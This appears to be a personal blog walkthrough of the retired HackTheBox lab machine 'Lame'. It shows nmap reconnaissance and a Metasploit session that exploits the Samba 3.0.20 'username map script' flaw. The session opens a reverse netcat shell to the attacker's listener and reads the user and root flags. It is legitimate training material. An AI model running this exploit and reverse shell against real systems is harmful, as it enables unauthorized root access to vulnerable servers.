HackTheBox: Lame walkthrough

No, not “a lame walkthrough” but “the walkthrough of the box called Lame.” That came off wrong. Anyhow ….

Yes, hello.

There are several HTB Lame walkthroughs out there — I am documenting these steps so that I can have a reference for future enumerations. Aight, let’s do this.

Intro

Lame is a super beginner friendly box, in fact this is my first walkthrough and the first box I ever rooted on HTB.

Time required: 15 minutes if you know what you’re doing, 1 hour if you are going to fumble your way through all this like I did.
You will also need a HTB VIP subscription for this is a retired box, and an attackbox that has nmap and metasploit installed. I am using Kali myself.

Let’s do this.

Recon

We shall start off with a basic nmap sweep, output below.
I break it down:
– Pn: Treat all hosts as online — skip host discovery (recommended by HTB)
– A: aggressive. Presently this enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (–traceroute).

kali@kali:~$ nmap 10.10.10.3 -Pn -A
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-26 22:56 EST
Nmap scan report for 10.10.10.3
Host is up (0.22s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.25
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h39m03s, deviation: 3h32m12s, median: 9m00s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-01-26T23:05:52-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.79 seconds

Fancy, eh?
Two things you need to take away from this output:
– Anonymous FTP login allowed
– The Samba version is Samba smbd 3.0.20-Debian

Exploit

A little detour: I ftp’d into the box as anonymous user. I poked around but I didn’t find anything so eventually I switched up my strategy. At this point I was getting quite frustrated so I did some googling and stumbled upon a hint. Fast forward 30 minutes…

I googled “Samba 3.0.20 Debian” and lo and behold, the first hit is our friends over at Rapid7 describing an exploit. Would you look at that. So I fire up metasploit, and searched for “samba”. Well, who would’ve thought, there was the exploit: 


sf5 exploit(linux/snmp/awind_snmp_exec) > search samba/usermap_script

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution


msf5 exploit(linux/snmp/awind_snmp_exec) > use 0
[*] Using configured payload cmd/unix/reverse_netcat
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.3       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.25      yes       The listen address (an interface may be specified)
   LPORT  4443             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.14.25:4443 
[*] Command shell session 6 opened (10.10.14.25:4443 -> 10.10.10.3:45786) at 2021-01-27 00:05:46 -0500

Tah-dah! We have a shell. The rest was a walk in the park:

msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.14.25:4443 
[*] Command shell session 7 opened (10.10.14.25:4443 -> 10.10.10.3:45787) at 2021-01-27 00:06:51 -0500

whoami
root
find / -name user.txt
/home/makis/user.txt
cat /home/makis/user.txt
<the user flag>

find / -name root.txt
/root/root.txt
cat /root/root.txt
<the root flag>

And that’s how you root Lame on HackTheBox.

Bis bald,
Anna

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.